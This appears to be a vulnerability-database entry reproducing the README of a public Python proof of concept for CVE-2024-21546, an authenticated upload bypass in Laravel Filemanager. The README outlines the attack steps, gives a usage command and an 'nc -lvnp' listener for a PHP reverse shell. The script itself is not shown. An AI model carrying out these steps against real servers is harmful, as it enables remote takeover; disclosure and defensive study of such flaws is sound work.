CVE-2024-21546 PoC — laravel-filemanager 安全漏洞

Source

Associated Vulnerability

Description

This Python exploit script targets a vulnerable Laravel Filemanager created by UniSharp, which allows authenticated users to bypass file restrictions and upload malicious files. This can lead to Remote Code Execution (RCE) when the uploaded payload is triggered.

Readme

# CVE-2024-21546 Python Exploit

## 🔥 Description
This Python exploit script targets a vulnerable Laravel Filemanager created by **UniSharp**, which allows authenticated users to bypass file restrictions and upload malicious files. This can lead to **Remote Code Execution (RCE)** when the uploaded payload is triggered.

The exploit performs the following:
- Validates the user-provided `laravel_session`
- Extracts CSRF `_token` via regex
- Uploads a fake PNG file containing a PHP reverse shell payload
- Triggers the uploaded file

## ⚠️ Affected Versions
Version 2.9.1 and prior version

## ⚙️ Usage
```shell
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
```
Important: Start your listener before running the script:
```shell
nc -lvnp <listener_port>
```

## 💻 Sample Run
![image](https://github.com/user-attachments/assets/cca00ceb-ef4d-4d5f-a24b-432c5d5ea398)

## ℹ️ Reference
- [CVE-2024-21546](https://www.cvedetails.com/cve/CVE-2024-21546/)
- [RCE through Upload Shell on Unisharp Laravel Filemanager](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [Commit 8170760](https://github.com/UniSharp/laravel-filemanager/commit/8170760c0ae316d77b9363cd4c76ab68d3f63f0b)

File Snapshot

 [4.0K]  /data/pocs/02d627acac05b3984d43ff7b8ae66a8f898d3245
├── [3.4K]  CVE-2024-21546.py
└── [1.2K]  README.md

0 directories, 2 files

Remarks